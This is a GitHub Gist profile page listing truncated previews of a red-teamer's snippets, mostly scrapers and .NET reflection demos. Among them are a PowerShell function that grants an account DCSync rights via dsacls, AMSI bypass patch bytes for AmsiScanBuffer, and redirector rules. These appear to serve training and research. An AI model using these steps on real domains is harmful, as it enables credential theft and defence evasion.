Skip to content

Instantly share code, notes, and snippets.

View jfmaes's full-sized avatar

Jean-François Maes jfmaes

524 followers · 8 following
View GitHub Profile
@jfmaes
jfmaes / functionextract.py
Created April 26, 2023 07:35
MSDN function definition scraper. requires chromium driver.
import argparse
import selenium as se
from selenium import webdriver
from bs4 import BeautifulSoup
import time
def main():
parser = argparse.ArgumentParser(description = 'extract function definitions from MSDN')
parser.add_argument('--methods', help='list of methods',required=True)
args = parser.parse_args()
#methods_list = []
@jfmaes
jfmaes / jumps.txt
Created October 19, 2022 14:35
dont even ask.
ntdll.dll
DbgQueryDebugFilterState from ntdll.dll
DbgQueryDebugFilterState from ntdll.dll
DbgQueryDebugFilterState from ntdll.dll
DbgSetDebugFilterState from ntdll.dll
EtwpGetCpuSpeed from ntdll.dll
LdrAccessResource from ntdll.dll
LdrCallEnclave from ntdll.dll
LdrProcessRelocationBlockEx from ntdll.dll
NtQuerySystemTime from ntdll.dll
@jfmaes
jfmaes / Invoke-SyncMeUp.ps1
Created February 26, 2022 10:28
Invoke-SyncMeUp.ps1
function Invoke-SyncMeUp{
[CmdletBinding()]
Param (
[Parameter(Mandatory=$True)]
[string]$AccountName
)
$dse = [ADSI]"LDAP://Rootdse"
$namingcontext = $dse.defaultNamingContext
echo "Giving $AccountName DCSync rights"
dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes"
@jfmaes
jfmaes / ipexploder.py
Created January 27, 2022 11:41
explode ips
import argparse
from ipaddress import IPv4Network
import os
def banner():
print(r"""
c=====e
H
____________ _,,_H____
@jfmaes
jfmaes / SANSReflection.txt
Created October 4, 2021 11:59
Register for the SEC699 ;-)
Hi SANS Workshop Attendees! Reflection is super fun!
amsi.dll
AmsiScanBuffer
uFcAB4DD
@jfmaes
jfmaes / ssl-scraper.py
Last active September 10, 2021 16:52
extract hostnames based on SSL certificates
#!/usr/bin/python
import requests
from socket import *
from requests.packages.urllib3.contrib import pyopenssl as reqs
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import ipaddress
#import asyncio
@jfmaes
jfmaes / .htaccess
Created March 23, 2021 12:19 — forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@jfmaes
jfmaes / AppDomainResolveTest.cs
Created December 21, 2020 09:53
example ingestor of NvisoLib for the blogpost
using System;
using NvisoLib;
using System.Reflection;
namespace AppDomainResolveTest
{
class Program
{
static void Main(string[] args)
{
@jfmaes
jfmaes / reflectiondemo.ps1
Created December 21, 2020 09:09
Sample Reflection of the HelloFromDotNetFramework assembly for the blogpost
clear
$bytes=[System.IO.File]::ReadAllBytes("C:\Users\jeanm\source\repos\HelloFromDotNetFramework\bin\Release\HelloFromDotNetFramework.exe")
$asm = [System.Reflection.Assembly]::Load($bytes)
$params = {null}
[HelloFromDotNetFramework.Program]::Main($params)
@jfmaes
jfmaes / HelloFromDotNetFramework.cs
Last active December 20, 2020 21:53
Sample Hello World for blogpost
using System;
using System.Reflection;
namespace HelloFromDotNetFramework
{
public class Program
{
public static void Main(string[] args)
{
Console.WriteLine("Hi from {0}", Assembly.GetExecutingAssembly());